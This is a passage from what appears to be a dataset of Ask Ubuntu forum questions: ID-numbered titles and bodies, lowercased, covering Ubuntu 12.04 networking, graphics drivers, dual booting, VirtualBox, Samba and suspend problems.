txqueuelen:1000 rx bytes:162945 ( 162.9 kb ) tx bytes:162147 ( 162.1 kb ) interrupt:49 route kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.1.1 0.0.0.0 ug 0 0 0 eth0 link-local * 255.255.0.0 u 1000 0 0 eth0 192.168.1.0 * 255.255.255.0 u 1 0 0 eth0 cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search charter.net ping -c 4 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . -- - 8.8.8.8 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3024ms the output of nm-tool : networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : jme state : connected default : yes hw address : e0 : cb:4e : b1:26 : dc capabilities : carrier detect : yes speed : 1000 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.11 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 208.67.222.222 dns : 208.67.220.220 dns : 192.168.1.1 results of ping -c 4 192.168.1.1 ping 192.168.1.1 ( 192.168.1.1 ) 56 ( 84 ) bytes of data . -- - 192.168.1.1 ping statistics -- - 4 packets transmitted , 0 received , 100 % packet loss , time 3024ms note : this non-response by the router may be because i have set under security | firewall | attack check | respond to ping on internet ports [ unchecked ] . 192.168.1.1 brings up the router login screen on the laptop running ubuntu 12.04 . i fixed it . thank you for your assistance . i really appreciate your input on where to look as i tried to resolve this issue . i went into the up|down arrow icon on the menu bar . this brings up network connections . under the wired tab i picked wired connection 1 and choose [ edit ] . that bring up a new options list with 4 tabs . i choose the 3rd tab [ ipv4 settings ] . choices method : manual addresses [ add ] address:192.168.1.7 , netmask:255.255.255.0 gateway:192.168.1.1 dsn servers : 208.67.222.222 , 208.67.220.220 , 192.168.1.1 search domains : charter.net dhcp client id : blank - no entry , no change require ipv4 addressing for this connection to complete : unchecked - no entry , no change routes - brings up a new options listing [ add ] address:192.168.1.7 netmask:255.255.255.0 gateway:192.168.1.1 - i left the 2 check box options blank and clicked ok. back one screen `` available to all users '' [ checked ] - no change , no entry save back one screen to network connections | wired close please excuse me if this fix explanation is too long or detailed . having searched this resource for answers to questions in the past i know i appreciated when there was more detail . i am new to this forum and do n't want to raise the ire of the sys admins , power users , and the like .
150426	ubuntu 12.04 with mate and video card issues	my laptop has a nvidia geforce g105m that is why i installed the appropriate nvidia drivers to make it work properly . as i am a truly gnome 2 lover i switched from unity to mate . but apparently in mate , although the drivers seem to be correctly activated , docky ca n't render 3d because it 's like the video card features are in some way disabled . so how do i make myself sure that the drivers are actually working ?
150433	sudo apt-get update giving error about duplicate	getting an error about duplicate sources , how can i get around this ?
150438	xfce4 overrode my gnome notifications ( notify-osd ) . how do i get them back ?	i installed xfce4 ( sudo apt-get install xfce4 ) and now in an ordinary ubuntu ( unity ) session i 'm getting light-colored ( what i 'm assuming are xfce 's ) notification bubbles . how do i revert this back to notify-osd ?
150439	mysql workbench on ubuntu 12.04 does n't starts after latest ( jun12 ) updates	mysql workbench was working fine till today . i installed the regular updates and now its just doesnt starts . when started its just shows the 'opening screen ' and nothing happens . i tried re-installing it from synaptic but no luck . i use it all the time and now suffering a lot . any help will be appreciated . when run from terminal with : mysql-workbench -- log-level=debug3 -- verbose it gives a long log . please see at : http : //pastebin.com/z2t8pdzf i see these error in the log but do n't know what they mean and how it stopped working automatically , /home/atul/.mysql/workbench/wb_state.xml:1 : parser error : document is empty ^ /home/atul/.mysql/workbench/wb_state.xml:1 : parser error : start tag expected , ' < ' not found ^ /home/atul/.mysql/workbench/user_starters.xml:1 : parser error : document is empty ^ /home/atul/.mysql/workbench/user_starters.xml:1 : parser error : start tag expected , ' < ' not found ^ /home/atul/.mysql/workbench/starters_settings.xml:1 : parser error : document is empty ^ /home/atul/.mysql/workbench/starters_settings.xml:1 : parser error : start tag expected , ' < ' not found atul
150445	why do the repositories not have the latest upstream versions ?	as a new ubuntu user , i 'm still trying to figure out the software management system . i 've noticed a few times already ( most recently today , looking for emacs 24.1 ) that the packages available in the repositories are lagging behind , sometimes seriously behind , current stable releases . then i end up installing from the binaries , but i think that means i 'm giving up the ability to follow updates further down the line . i 'm guess i 'm just wondering how the apt repositories get updated , and by whom . when there 's a lag , is it because the developer has n't pushed the most recent release onto the relevant server ? is there a lot more work for the developer in getting the release into a form the repository can use ? i expect there 's an article out there somewhere explaining all this , but i have n't been able to find it .
150446	how can i easily install ruby on rails ?	how can i easily install rvm , ruby 1.9.3 , rubygems , passenger and rails all in one go ?
150450	reinstall os on a dual-boot system ?	i have an old ( 2005 ) imac g5 with a powerpc processor . it currently runs macosx and ubuntu 12.04 . i believe that the bootloader i use is yaboot . anyway , ubuntu 12.04 runs really sluggish so i installed the lxde desktop . i really like it , and would like to completely wipe my ubuntu partition and replace it with lubuntu , without affecting my macosx partition . is there a way to do this ?
150453	unable to install mysql workbench on 12.04 with synaptic , dependency error	getting dependency is not satisfied libmysqlclient16 ( > -5.1.21-1 ) how can i resolve that error ?
150463	how does canonical sustain its finances ?	since ubuntu is , and will always be , free and no many i know go for anything that is paid for ( like paid games or ubuntu one 's paid features ) , i wonder how come they are able to sustain finances ?
150464	is there a comprehensive list of the ubuntu web services for developers ?	canonical/ubuntu provides many services for developers/users , but there does n't seem to be a complete list of these services anywhere . these services help get people involved and help developers work on issues .
150468	hybrid graphics on windows 7/ubuntu 12.04 dual boot	alright , so here 's the situation : i am using an asus ul80vt with two graphics cards : integrated intel graphics and nvidia g210m i was running an ubuntu 12.04 - windows 7 dual boot ( on separate partitions ) .the machine worked perfectly ( including the display drivers ) without me needing to install anything special or change any settings . however , my hard drive was corrupted and i lost all my data yesterday , so after it was replaced , i installed ubuntu 12.04 64x again after installing windows 7 . i booted up ubuntu after installation , and noticed it was by default using unity 2d ... gnome 3.4 was n't working properly either , so i guessed that the nvidia g210m driver was n't installed/working and the os was instead using the integrated graphics . i checked the `` additional drivers '' thing , but there were no proprietary drivers listed there , so i went to the nvidia website , downloaded the driver directly and installed it . i restarted , but there was no change . after this , i read somewhere that i should change my sata in the bios to `` compatible '' rather than `` enhanced '' . this worked fine and fixed the problem ( both unity and gnome were working perfectly ) but then when i tried booting up windows 7 , i recieved the bsod . so i changed it back to enhanced , and once again , the nvidia 210m graphics is n't working on ubuntu , but on windows 7 it is . i do not want to keep changing from enhanced to compatible every time i reboot to ubuntu and neither do i want to simply just use one os . note that nvidia 210m and integrated graphics work perfectly on windows 7 . also , i do n't care about switching between them , i just want to be able to use the nvidia one . what can i do so that both windows 7 and ubuntu work and nvidia g210m works on ubuntu ?
150476	how do i submit a full bug report with crash dump and steps to reproduce ?	i have found a reproducable crash bug in xserver-xephyr . when i run the following command : apport-bug /var/crash/_usr_bin_xephyr.1000.crash it sends a whoopsie report and does not ask me for any extra information such as how to reproduce the bug , which i know . it also does n't file a real bug report . how am i supposed to do it ?
150478	.desktop howto : persistent terminal , custom $ home	i have a web server .jar file ( it 's a jetty application ) that i 've created a .desktop file for . clicking on the .desktop file opens a terminal , begins running the application , and then closes the terminal ( and the application with it ) . two questions : first , how can i make this terminal persist ? and secondly , the application needs to be launched from a particular directory , is there a way to specify that ?
150485	how can ubuntu update running applications without having to close them while windows can not ?	running ubuntu 12.04 64 bit edition [ and loving it : d ] i mostly update through terminal using sudo apt-get update & & sudo apt-get upgrade i couldnât understand this , that , having firefox or any other such integrated application actively running along with update process running concurrently in terminal , which is updating firefox to newer version . i am aware that that restarting firefox will be opened with newer version or rather any other application for that matter . my question is , for example-updating in ms windows 7 , it asks for closing the active instance of same application ( if active ) for updating . [ i am not comparing the os 's ] how does ubuntu replaces the active working application to newer version without interfering with its active instance . [ noticed for many packages ] what exactly does happen at the back-end of updating process in such matter . p.s . - could n't resist the temptation , so atlast i asked it ( could be a stupid question though ) : d
150487	what happens under the covers to log me in and start up unity or another graphical user interface ?	when there 's trouble , it might be good to understand what happens under the covers to sign a user into a gui session and get a unity ( or other window manager ) to bring up a desktop .
150489	usb flash drive wont detect hard drive/sata	ok here goes nothing . i had a problem installing ubuntu desktop from a cd drive . live system not detected issue . got the install process going a few times but it seemed to crash towards the end ( tried 15 times got it to boot once which also crashed ) . so i decided to do it with a usb stick hp ( 4gb ) . i used the universal boot loader to create the iso . so there 's no issue with the credibility of the iso . bios was configured to boot from the usb stick . the system booted from the usb drive but when i tried installing ubuntu into the hard drive , i got the error of not enough disk space . so i figured the flash drive was trying to install ubuntu in itself and not into the hard drive . thus didnt detect my hard drive . my question is how do you do a bios update/upgrade ? how do i get the flash drive to detect the hard drive ? is there any other way that you have in mind that i might try ? note : my bios is american megatrends . manufacturer xfx . mi-a78s-8209 . hard drive hitachi 1t .
150491	ca n't mount or unmount virtual discs- gives option for `` force unmounting ''	i 've installed ubuntu ( 64-bit version ) on a vm through virtualbox on a windows 7 64-bit host , but i fear that i 've done something wrong . first , when i restart my computer , it just goes straight to windows 7 , as normal . is there a separate step to have a selection menu at start-up or does this not apply for virtualbox runs of ubuntu ? then , when i go to `` devices -- > install guest additions '' within ubuntu ( running it by simply starting vb and clicking start on vb gui for ubuntu ) , i get the following error message : unable to mount the cd/dvd image c : \program files\oracle\virtualbox\vboxguestadditions.iso on the machine ubuntu desktop 12.04 64-bit . would you like to force mounting of this medium ? could not mount the media/drive 'c : \program files\oracle\virtualbox/vboxguestadditions.iso ' ( verr_pdm_media_locked ) . and i get a choice to `` force unmount '' the mounted iso file within ( which is indeed the vboxguestadditions ) . also , when i click on the cd icon on the bottom right of the ubuntu window so that i can `` remove disk from virtual disk '' , i get a similar error message , except this time it says that it can not unmount : unable to unmount the cd/dvd image c : \program files\oracle\virtualbox\vboxguestadditions.iso from the machine ubuntu desktop 12.04 64-bit . would you like to force unmounting of this medium ? could not unmount the currently mounted media/drive ( verr_pdm_media_locked ) . but when i go to the vb gui and select `` settings '' and go to storage , i guess i can unmount from there because i get no error message . if i unmount there and then go back into ubuntu , the virtual cd is unmounted . any help would be awesome !
150492	way to make video-thumbnails generate from vlc instead of totem ?	i 'm suffering from problem that video-thumbnails do not appear in nautilus for some video files . i just found this bug typefinding : some mpeg files are not identified as mpeg files which seems to address the problem . i do n't understand the specifics as reported in this bug report , but it sounds like it 's a problem with totem 's interaction with gstreamer . since all my videos play fine with vlc ( and they do n't all play with totem ) , i do n't use totem very much . is there a way to make vlc generate the video-thumbnails instead of having to rely on the buggy gstreamer/totem ? i made vlc my default video player but this had no effect on the display of video-thumbnails . if totem ca n't play the video file , then i get no thumbnail . but vlc can play the videos fine , so why ca n't vlc create a video-thumbnail for it ?
150493	how do i explore the ubuntu 12.04 partition in windows 7 ?	i 've got windows 7 ( 64-bit ) and ubuntu 12.04 ( 64-bit ) installed on different partitions . when i 'm booted in ubuntu i 'm able to explore my windows partition . how can i explore my ubuntu partition when i 'm booted in windows ? if it 's possible i 'd like to have the partition appear under the hard disc drives in computer . how would i do this or something similar ?
150496	wubi wo n't start on windows 7 64-bit	i have got latest wubi . and when i run it it asks me for admin privilidges , and then nothing happens . i read that u have do something with python at system paths . but i do n't have any python on that paths . what i should do now ? os : windows 7 ultimate x64 .
150499	`` unknown filesystem '' error without cdrom	i 've got a problem with ubuntu 12.04 lts . at first i ran mount command on terminal . then i restarted my computer . after that , when my computer opened there is writing this : error : unknown filesystem grub rescue > i searched commands and i found ls command . i tried it and i got this : ( hd0 ) ( hd0 , msdos5 ) ( hd0 , msdos1 ) my computer 's dvd driver is broken and i tried to boot ubuntu on usb but it does n't worked . my computer 's specs : pc name : hp presario f780et processor : amd turion 64 x2 mobile technology tl-60 ram : 2gb ubuntu version : 12.04 lts
150501	how can i make a ubuntu live usb with ubuntu , gparted & hbcd ?	is it possible to create a ubuntu live usb installer using ubuntu , gparted & hbcd ? if yes could anyone brief the procedure in details please ?
150502	bars do not disappear watching videos full screen	i just installed ubuntu 12.04 . i switched to the classic view because i did n't feel comfortable with the unity . when i watch videos or movies , i double-click ( as always ) to make them full screen . but then , the bars ( i do n't know if this is correct wording . i mean the bar on the top which has `` applications '' and `` places '' , and the bar on the bottom with the windows . ) do not disappear . they remain above the video and block part of the content ( especially the below part with the subtitles : ) ) . what should i do ? ps : i guess this is a very simple thing and i 'm a little ashamed for not knowing the solution .
150518	dell inspiron 17r settings buttons do n't work in ubuntu 12.04 ?	i have just installed ubuntu on my dell inspiron 17r , and the settings buttons used to turn off the display or access settings do not work in ubuntu while they did work in windows . do i need a driver ?
150520	nothing work after suspend / sleep , ca n't even reboot	i pressed the suspend button and now my computer is useless , my screen wo n't turn on , my keyboard and mouse have power but wo n't do anything . i tried pressing the power button in order to awake my pc but it did nothing , i also tried a reboot but nothing changed ... i ca n't use anything ... how do i fix this problem ? any help be greatly appreciated..
150521	ubuntu wo n't boot from usb	just made my usb bootable via pendrivelinux but now when i reboot i ca n't choose the usb - my only options to show up are windows 7 and ubuntu from a previous wubi version i used ( wo n't boot , btw ) what do i do ?
150526	what are these abbreviations ?	can anyone tell me for what these abbreviations stands for ? coud n't find it on the web . cpu ( s ) : 3.2 % us , 0.8 % sy , 0.0 % ni , 95.6 % id , 0.4 % wa , 0.0 % hi , 0.0 % si , 0.0 % st thanks in advance .
150528	problem when fullscreen youtube or vimeo videos ubuntu 12.04 only	when i fullscreen youtube or vimeo videos in ubuntu 12.04 they get laggy . i did n't have this problem when i was using ubuntu 11.10 . i know it might be something with flash , but i do n't know how to fix it . thanks . also i 'm using google chrome , i also try it in mozilla firefox and i get the same problem . this is happening with vimeo and youtube .
150537	black screen ( but with cursor ) after wake-up from suspend to ram	i have a lenovo thinkpad x60 . after upgrading to 12.04 , first thing i did was get suspend to hdd back , because i do n't use my battery a lot . so i did that . after a while ( about a week , i upgraded on release , not beta ) , maybe a week or so , i started getting black screens from time to time after waking it up from suspend to ram . i never got that problem with suspend to hdd . as it only happens sometimes , i ca n't reproduce it . sometimes it does n't happen for a week ( daily use , approx 2-6 wake-ups a day ) , then every single time . the precise symptoms are as follows : normally i got a black screen with my cursor on it , which can be moved , no problems there . i ca n't interact with the system in any way except for turning it off on the 1/0 button . the weird thing is , the cursor seems to react to what i had opened when going into suspend to ram , so for instance one day i had writer open and then my cursor was a `` i '' for most of the screen . i only get this in 12.04 , never had any problems with this in 9.04-11.10 . any ideas ?
150539	how to make xfce show the shutdown menu ?	i have installed xfce on an `` ubuntu server '' ( in a virtual machine ) so i have a small and fast environment . but when i want to log out , i usually ( not always ) see a gray shutdown and reboot button , but i like to be able to shutdown via that menu ( i know of shutdown -h now , but the users of my machine do n't necessarily know ) . i use the display manager 'slim ' . question : how can i enable these buttons permanently ?
150540	only run cron job if connected to specific wifi network	i am a newbie to scripting on linux ( lubuntu ) , but i would like to make a script that runs a cron job only if my laptop is connected to my home wifi . is this possible ? i guess , i could do something with iwconfig and pull the essid from there with grep ? so far , i tried this and it seems to work : # ! /bin/bash # cron , connected to specific wifi clear netid=hoff216 if iwconfig | grep $ netid then clear echo `` true , we are connected to $ netid '' rsync ... ... ... .. else clear echo `` false , we are not connected to $ netid '' fi
150542	youtube videos not playing	i recently means today installed ubuntu along with windows 7 means this is a dual boot system . so this is the case i installed ubuntu 11.10 and than upgraded from 11.10 to 12.04 and after installing the updates , youtube videos are not playing . i 'm using chrome as my primary browser . flash player is installed by default but still i uninstall it and re install it just to make sure everything is ok . but still videos are playing . chrome version 19.0.1084.56
150543	canon mp970 and ubuntu 12.04 lts x64 ( network printing )	so i 've got a canon mp970 printer wich i would like to use with ubuntu . i 've searched the internet but was n't able to find any decent information on acquiring and installing the correct drivers etc . to use this printer as a network printer . 1 ) i know my printer 's ip adress ( it has a fixed ip ) 2 ) on neither the canon usa or canon eu site are printer drivers for linux . any help ? kind regards , s
150550	installing ubuntu with windows , which is left and right when allocating space ?	i 'm installing ubuntu ( or xubuntu/lubuntu/kubuntu ) alongside windows 7/xp . i got to the screen that says , `` allocate drive space by dragging the slider below . '' on the following screen , i 'm not sure whether the right side or the left side is for ubuntu or for windows . which side is which ? screenshot for ubuntu : ( see here for lubuntu )
150554	wrong alt+tab menu icon & text for wine apps	i have wine 1.4 installed but for some reason its alt+tab menu entry does n't show the normal wine icon . there is a generic 'document ' icon with the text `` uninstall '' . what should i do to get the original icon and text ?
150556	why does virtualbox crash if i close ubuntu one way but not if i close ubuntu another way ?	i am running ubuntu 12.04 64-bit as a guest on a windows 7 sony vaio laptop ( 64-bit ) . here is what happens : i start up ubuntu via the virtualbox manager ( by clicking start ) - it runs in scale mode to start out ( windowed mode ) . in this scale mode , i have two options to close ubuntu : 1 ) click the `` x '' in the upper right-hand corner of the ubuntu window and just close it like a normal window . a menu pops up with 3 options : a ) save the machine state ; b ) send the shutdown signal ; and c ) power off the machine . if i choose option 'c ' , the window just closes and ubuntu is no more- i am back in my host windows 7 environment . 2 ) the second option i have is by clicking the power symbol while in ubuntu ( which is right below the `` x '' that closes out the window ) . when i click `` shutdown '' , i get an error message from oracle vm virtualbox manager : `` orcale vm virtualbox manager has stopped working . '' it searches for a solution , but does not find one , and the only option i have is to `` close program . '' so why does closing ubuntu by `` sending the shutdown signal '' crash virtualbox but if i simply close the ubuntu window by `` x '' ing out of it , and click `` power down machine , '' i have no problems ? p.s . i can also post the vbox log if that will help id the root of this problem .
150563	how to configure screen brightness when not using a laptop	for a way too strange reason , my tv ( which i 'm using with a dell inspiron 1145 laptop running ubuntu 11.10 ) does not allow me to do a fine-grained brightness configuration . therefore , i 'm looking for a way to configure this using ubuntu by itself . i 've found a lot of articles/forum posts describing how to this , but all the solutions were related to notebooks . is there a way to configure my tv/monitor brightness without using its own controls ?
150565	what does `` upgrade volume detected '' mean when creating a bootable usb stick ?	when creating a bootable usb stick for ubuntu 12.04 server edition , the startup disk creator pops up the `` installation complete '' window and another window titled `` upgrade volume detected '' which says the following : a distribution volume with software packages has been detected . would you like to try to upgrade from it automatically ? with options to cancel or run upgrade . what distribution volume is it talking about and where did it detect it ? what does `` upgrade from it automatically mean '' ?
150568	how to get full rights in ubuntu to manipulate a file that is owned by root	i want to have full rights in ubuntu 11.10 so i do n't have to use the terminal every time i want to copy and paste or edit a file that is owned by root . is there a way to do this ? i changed my user role to administrator and it does not appear to have changed anything . is there a way , like ms windows to simply copy/paste or edit files folders with momentary privileges to perform the task without the requirement to do it through terminal ?
150574	libreoffice base reports not working after upgrade to ubuntu 12.04	after upgrading his computer to ubuntu 12.04 , my granddad 's reports in all of his libreoffice databases no longer work , even though the underlying queries still work . sorry for so little diagnostic information ; i do n't know much about base , so i do n't even know where to begin debugging this problem .
150577	can i log in as invisible when using empathy ?	i am using empathy to access msn and google talk . every time i log in , my status is busy , and i have to change it to invisible . i wonder if i can save the setting of being invisible upon logging in ? i am using ubuntu 12.04 . thanks !
150582	switching over to awesome from openbox , can i still use my menu.xml	i 've been using openbox in lxde for a couple of years now , and i have my menu.xml just the way i like it . i see in awesome the default menu seems to be constructed in the rc.lua , but i also see that others have used different menus altogether ( freedesktop menu for one ) . is there any way for me to use my menu.xml in awesome ?
150583	installing my graphic card on ubuntu12.04	i have a hp pavillion g6 series 1225 , i5 laptop with radeon hd 6470m switchable vga . i installed ubuntu 12.04 lts but the vga drivers do n't work properly . i want to install drivers into the ubuntu . but when i do it arrived error message like this : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log i found a solution in a link : http : //ubuntuforums.org/showthread.php ? t=1930450 it works for a few steps and then in the installation of the package of the amd driver , a message pops up 'fatal error ' and it redirects me to ask ubuntu to find a solution , please help me , i need to make it work .
150585	start terminal-based application from main menu ?	i am using ubuntu 12.04 x86_64 . i have downloaded and extracted ancient domains of mystery ( adom ) v1.1.1 . i want to add a shortcut to it in my games folder in the main menu . i tried adding the following : ./downloads/adom/adom but nothing happens . how do i start adom in a gnome-terminal ( with an appropriate terminal size of at least 25x77 ) from the main menu ?
150587	dell xps l502xnot detecting monitor-tv	i 'm running ubuntu 12.04 lts on a dell xps l502x and when i connect the hdmi cable from the tv to the computer ubuntu detects nothing at all , it works perfectly fine in windows 7 though . i 've already went to the display control , plugged and unplugged the tv , clicked the detect displays button , and nothing . do i have to activate the hdmi output or something ? because i used another computer with a vga output and it worked perfectly .
150588	setting up multiseat on 12.04	i 'm using a single nvidia quadro fx 3700 card on my system . this thread : how to set up a multiseat system ? suggests that changes should be made to the lightdm.conf and xorg.conf files . when i made the suggested changes to xorg.conf and the following [ lightdm ] displays=display0 display1 [ display0 ] xserver=xserver0 [ display1 ] xserver=xserver1 [ xserver0 ] layout=layout0 [ xserver1 ] layout=layout1 changes to lightdm.conf , from what i remember , ubuntu failed to detect my second monitor . other information i 've found gives directions for older versions of ubuntu which use different display managers ( gdm as opposed to lightdm ) , which does n't help . i also tried using http : //code.google.com/p/multiseat-wizard-bicefalo/ but it did n't detect my second monitor so i could n't follow the directions given . in the first thread i linked to somebody claimed `` in terms with running multiple x sessions from one video card this is currently unsupported . '' which suggests that it might not be possible with my current setup . i do n't really know what i 'm doing , i 'm just trying to follow any resources that are available . so how do i do it ? is it even possible with 12.04 and only one video card ?
150592	why is gnome shell broken after update ?	i just install today 's updates in ubuntu 12.04 , and after a restart my gnome shell desktop looks like gnome 2 with two panels . see photo : none of my gnome shell extensions work now either . the ubuntu software centre says gnome shell is still installed . did the update brake gnome shell ? ?
150595	12.04 installer is not recognizing current os	i am trying to install ubuntu 12.04 lts on my lenovo y570 , which already has windows 7 on it . in the installer , it says that no os is currently installed on my computer , and it only gives me two options : install ubuntu and wipe the disk ( which i 'd rather not do ) something else . i think what might be causing the problem is the fact that my lenovo has a 64 gb ssd with rapiddrive . i 'm not sure about this . i 've tried removing the dmraid metadata as suggested in an answer in here and also removing the dmraid ( not sure what that means ) is also suggested in the above article . i 'm completely new to ubuntu , and ( i apologize for this ) ask that you keep your help as simple as possible . i have tried before to use the `` something new '' option , but i only setup two partitions for ubuntu ( swap and one ext4 partition , with the ext4 being mounted at `` / '' ) and ended up having to restore my computer . i 'd rather not go through that again unless i have extremely precise , step by step instructions ( including how to setup the partitions , like what sizes and file systems . ) edit : in response to biggenius : i do n't have any installation media , so no installation disc . i only have recovery media that i burned myself .
150596	usb encrypted vm with ubuntu	new user here trying to get involved with linux . let me first say that i am enthralled with the linux community , everyone is very knowledgeable and willing to offer input . question : i would like to install a portable version of virtualbox + ubuntu on a usb drive ( i know how to accomplish this ) . however , i would also like to have the usb drive encrypted ( as usbs are prone to being lost ) . problem : i 've heard that encrypted usbs tend to only work for certain os , thus reducing the `` portability '' of my usb+vm+ubuntu setup . is there any known solution/tutorial in which a usb+vm+ubuntu can be configured ? additional notes : i would also be using a usb wireless adapter so that i would not have to rely on the host 's wifi card . i doubt that this would cause any further complication , i would just have to configure the vm to read the usb port in which the usb-wifi was connected . thanks !
150601	why nvidiabl module is not working in precise ?	i 've just installed nvidiabl module from https : //github.com/downloads/guillaumezin/nvidiabl/nvidiabl-dkms_0.74_all.deb and screen brightness still is not changing . i have nvidia g210m , precise amd64 , vaio vpccw19fx
150608	how to fix wine apps that have a white background in unity tray	many wine apps and also some java apps like evernote or jdownloader appears in unity tray with an annoying white background . is there a way to solve this issue ? here is a screenshot about it :
150610	why are virtual terminal blank using nvidia propietary drivers ?	when using nouveau the fps are low compared to nvidia closed driver . but when booting , nvidia drivers show the ubuntu splash screen in a 900x800 resolution like nvidia its not loaded yet . when nouveau it splash in a decent resolution . the problem i 'm having since karmic koala is i cant switch to virtual terminals with nvidia closed drivers . by the way , is the same pc : vaio vpccw19fx with nvidia g210m , now with precise amd64 . to make easy to read the configs , i pastedbin'ed each file in differents pastes . /etc/x11/xorg.conf > > http : //pastebin.com/ly7n5d2t /etc/default/grub > > http : //pastebin.com/vpbykrvs lsmod > > http : //pastebin.com/a7q3z9zl lspci > > http : //pastebin.com/bd4vpcpf
150611	how to tell ubuntu where to install a program and how to tell where an existing program was installed ?	i 'm totally new to ubuntu/linux , using ubuntu server at the moment . just trying to figure out something basic . how can you tell where you are installing a program . for example i just installed sphinx search engine by placing the tarball that i downloaded from their site to my : /home/sphinx directory . i created the sphinx directory to place that tarball in . then i ran these commands : tar xvzf sphinx-0.9.8.1.tar.gz cd sphinx-0.9.8.1/ ./configure -- with-mysql-includes=/usr/include/mysql -- with-mysql-libs=/usr/lib/mysql and then these : make sudo make install now i have a lot of files sitting in the directory where i ran these commands . is this my spynx installation or did it install somewhere else ? in windows if you run an installer ( .exe file ) anywhere the program will still install in your c : \program files directory . does something similar apply to linux where all programs are installed in a central place , or can you install programs anywhere on the system . questions i would prefer to keep all my installed programs in one place so what is the right place for this in terms of best practice . in other words what is the linux equivalent of c : \program files ? and how does one always install at this location , is it just a matter of placing the tarball and running the install commands from this location ? what about if i use sudo apt-get to install a package . how can i point to this location to tell apt-get to always install there ?
150613	graphics cards not waking from sleep	i 'm fairly new to ubuntu and unix based systems as a whole . so far , my only concern is that my graphics cards are not waking from sleep ( hibernate ? ) mode . when i move my mouse or hit a key on my keyboard while it is in sleep , i hear my cpu and case fans turning on . however , i do not hear my gpus . i have two hd radeon 6870s with amd 's proprietary driver installed from their website . i am also running ubuntu alongside windows using wubi . any help would be much appreciated .
150616	ctrl+c does not quit a running program in terminal	ok , i do n't know why , but i 've seen this question been asked many times , but none of the answers seem to be helpful , yet the problem is quite obvious , because i verified it on several computers . ctrl+c does not kill a running program in terminal ( ubuntu v10 ) even though it 's supposed to . i wonder if anyone can actually point a solution that actually works . so far i 've tried ctrl+\ , ctrl+sysrq+k , and much more - nothing works ! the only thing that did work , sort of , is ctrl+z , but it does n't actually kill/exit the program , but simply puts it in a background and then you still have to do kill % 1 to actually kill it . thanks !
150617	how to use host names rather than ip addresses on home network ?	i 've a small home network up and running and managed to set up ssh . can anyone tell me what i need to do to refer to one computer on the network from another by host name rather than ip address ( which is what i 'm doing now ) ?
150619	after installing 'world of goo ' ... very bad things happened ... help ?	i have the deb for 'world of goo ' and installed it in 11.04 . all seemed to be ok . started it ... things got very strange ! ! ! it 's intro started and everything else vanished 100 % full screen , and neither kb nor mouse had any effects . i am sad to admit that ultimately after trying any/every combo i could think of= > i pushed the power button . my bad - my very bad , it seems . when i restarted the pc every bit of my stuff was gone , it was back to some strange default i had n't seen before - my firefox bookmarks are gone , my extensions are gone , many , many things are just ... gone . can anyone please explain what may have happened and tell me if there is any road back short of reinstalling/re-creating everything ? i know i should be creating back-ups and likely need to have something protecting these things like 'back-in-time ' or the like , but , well - i wanted to play a bit and had no idea how bad this could possibly be ! ! ! ? ? ? thanks . ( post-script ) note to aspiring editors : i have requested help with os problems here and not with writing about them kindly only contribute useful/helpful info . if you have a need to edit something please edit your own work as i am quite capable of editing my own if i consider it to be needed . thanks .
150624	gnome-panel custom menu	i just reinstalled 10.04 and i ca n't for the life of me remember how i did this . i used to have an icon on my panel which , when clicked , would roll out a specific sub-menu found int he main menu . for example : whereas i can click applications > system tools > virtualbox > webserver right now , i used to e able to click the icon on the panel and the virtualbox menu would pop up out of the icon . it was n't a drawer because the items displayed were whatever was in the linked submenu , i did not have to update them both separately . any ideas how i got that working before ?
150631	unable to start grub2 on triple boot macbook pro with os x lion , windows 7 and ubuntu	i installed windows 7 using bootcamp . then i created a partition from the empty space in the windows partition and another 4gb partition for the linux swap using gparted . i installed ubuntu 12.04 lts in the the newly created partition from the windows partition . now grub2 does not load and i can only see the blinking cursor on the top right when selecting `` windows hd '' from the 'option ' key at the start up . os x works fine but nothing else . could someone please help me fix this ? i am attaching the boot-info from the boot-repair tool . http : //paste.ubuntu.com/1040169/
150639	`` failed to mount windows share '' error in samba	this is the situation . there are 3 machines in the office . the operating systems on them are respectively , linux mint ubuntu 12.04 windows vista the ubuntu ( # 2 ) machine is supposed to be the common file server between the machines # 1 and # 3 . machine # 2 has two hard disks . one is a 500 gb ntfs empty drive and the other is a 160 gb ext4 drive . my plan is to make the 500 gb as the file sharing disk . when i share a folder like ~/documents using nautilus context menu on machine # 2 , i can access the files easily on both # 1 and # 3 , but when i try to share some folder on 500 gb disk , i get an error on machine # 1 that says failed to mount windows share i do not mind formatting the drive to ext4 if needed , but i am sure that something simple is wrong . edit i took @ marty 's comment as a hint and used ntfs-config to configure automount of that partition . it is working now . thanks
150641	ubuntu hangs after replugging the modem	i am facing this issue on ubuntu 12.04 , which is for my wimax modem with beceem chipset . if i replug the device ubuntu goes in hang state . its happens very often . if i plug the usb and restart it works most of the time . but it is very annoying to restart every time it hangs . the modem works smoothly in windows 7 . and it used to work ok in ubuntu 11.10 . jun 13 19:25:54 iftekhar-hp-520-notebook-pc dbus [ 1102 ] : [ system ] activating service name='org.freedesktop.udisks ' ( using servicehelper ) jun 13 19:25:54 iftekhar-hp-520-notebook-pc dbus [ 1102 ] : [ system ] successfully activated service 'org.freedesktop.udisks' jun 13 19:26:00 iftekhar-hp-520-notebook-pc goa [ 2168 ] : goa-daemon version 3.4.0 starting [ main.c:112 , main ( ) ] jun 13 19:26:47 iftekhar-hp-520-notebook-pc udevd [ 432 ] : timeout 'cdrom_id -- lock-media /dev/sr1' jun 13 19:26:48 iftekhar-hp-520-notebook-pc udevd [ 432 ] : timeout : killing 'cdrom_id -- lock-media /dev/sr1 ' [ 1072 ] jun 13 19:26:49 iftekhar-hp-520-notebook-pc kernel : [ 85.820162 ] sr 2:0:0:0 : device offlined - not ready after error recovery jun 13 19:26:49 iftekhar-hp-520-notebook-pc udevd [ 432 ] : timeout : killing 'cdrom_id -- lock-media /dev/sr1 ' [ 1072 ] jun 13 19:27:20 udevd [ 432 ] : last message repeated 31 times jun 13 19:27:25 udevd [ 432 